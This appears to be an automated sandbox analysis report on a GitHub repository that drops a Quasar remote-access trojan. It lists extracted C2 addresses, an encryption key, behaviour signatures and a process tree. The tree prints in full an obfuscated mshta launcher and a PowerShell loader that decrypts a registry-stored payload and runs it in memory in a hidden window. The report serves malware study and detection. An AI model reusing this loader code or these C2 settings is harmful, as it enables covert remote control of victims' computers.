Resubmissions
30-06-2024 20:33
240630-zb2tcsxhrk 730-06-2024 20:26
240630-y78q4svarb 1030-06-2024 20:25
240630-y7p9rsxgjm 1Analysis
-
max time kernel
217s -
max time network
246s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
-
submitted
30-06-2024 20:26
General
-
Target
https://github.com/Excalisz/Shadow-Grabber-
Score
10/10
Malware Config
Extracted
Family
quasar
Version
1.0.0.0
Botnet
v2.2.6 | Tinsler
C2
throbbing-mountain-09011.pktriot.net:22112
167.71.56.116:22112
throbbing-mountain-09011.pktriot.net:5050
Mutex
cf16a257-7d89-4296-8384-8fca3dbb568f
Attributes
-
encryption_key
045F98A287DD47B8B5C074D234995A2C5A913042
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
1000
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 15 IoCs
-
Executes dropped EXE 7 IoCs
-
Hide Artifacts: Hidden Window 1 TTPs 4 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 22 IoCs
-
Drops file in Windows directory 12 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Checks processor information in registry 2 TTPs 30 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 11 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies registry class 24 IoCs
-
NTFS ADS 4 IoCs
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 45 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{982b105d-4ff0-4db4-a092-125e0fff31ae}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{45e7c5c1-0501-463d-b264-506e3109e924}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1a775a46-a247-49d4-9ba2-7f91c8e9fc08}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{661e236f-9f3e-4c55-acc3-6cb777eba59f}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{258100b7-590c-45e1-9f1b-05a1c6485a55}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{78f4b273-37ea-41f2-86d0-e83ef596b666}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6604 -s 4083⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{956d5857-ba7a-4a6a-8372-f0d36493aae1}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7008 -s 4123⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{41fc4822-883b-4647-a525-3bfa5b979065}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6108 -s 3243⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{291a6aad-4c19-4509-aa22-215d2fedec93}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6bb535ad-cefe-4bc5-9c63-23542c75d01f}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d5cc7e19-4999-4667-afc2-4b66c3b01c83}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1608d58a-4a0a-4640-9fba-0cd4fc83ea65}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{8e6a81c5-4614-42f6-aac5-cef00bfb1d4d}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{643f90f6-a869-4348-9d8b-aa97d0cf3f53}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{02a52147-4897-4812-a6c0-a21132193c94}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3db540ea-bb6a-4512-bfe8-1a68b03fc925}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%3⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{3e25bd7b-f7ba-4452-96bd-65a74d0e4b4e}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4976).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{769ae426-e739-4682-89d1-b39388590f22}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{fcf5b0f2-260d-440c-bc0c-8cf94d5e9152}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{890b9a93-eaaa-4a90-ba4d-03b09e9dc71e}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ec89e5f2-e9ae-4cac-9b30-d226b04a1d55}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{8a92fddd-246d-4ab0-bb2d-cb03931777f0}5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 4686⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
